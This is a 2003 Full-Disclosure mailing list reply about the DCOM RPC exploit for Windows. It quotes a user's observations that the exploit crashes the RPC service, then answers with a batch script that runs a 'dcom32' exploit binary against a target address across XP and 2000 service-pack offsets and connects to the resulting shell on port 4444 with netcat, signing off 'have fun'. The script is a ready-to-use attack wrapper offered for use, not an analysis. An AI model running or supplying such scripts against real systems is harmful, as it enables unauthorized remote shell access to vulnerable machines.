----- Original Message ----- From: "john" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Monday, July 28, 2003 7:42 AM Subject: [Full-Disclosure] dcom exploit code observations
> Downloaded the revised exploit code by HD moore and got it compiled on a > linux box. > > There seems to either be some flaws in the exploit code or just a > general instability of the rpc service. > > If the code is run against a vulnerable box and the right SP level > setting is not correct it crashes the rpc service and shuts down the > port. Restarting the service will bring it back online. If the attack is > successful you get a nice pretty windows shell. If you exit the shell > the rpc service again crashes. > > I am sure the code will be revised to eliminate these problems. > > John > THIS IS NOT THE CASE... this .bat works perfect... ------------ snip ------------------- @echo on @echo ..................................................... @echo RPC script by morning_wood @echo .................................................... wait @echo ... @echo trying XP Service Pack 0 dcom32 5 %1 nc -v -n %1 4444 wait @echo trying XP Service Pack 1 dcom32 6 %1 nc -v -n %1 4444 wait @echo trying 2K Service Pack 4 dcom32 4 %1 nc -v -n %1 4444 wait @echo ........... have fun wait @echo bye now exit -------- snip ------------------- w00d _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html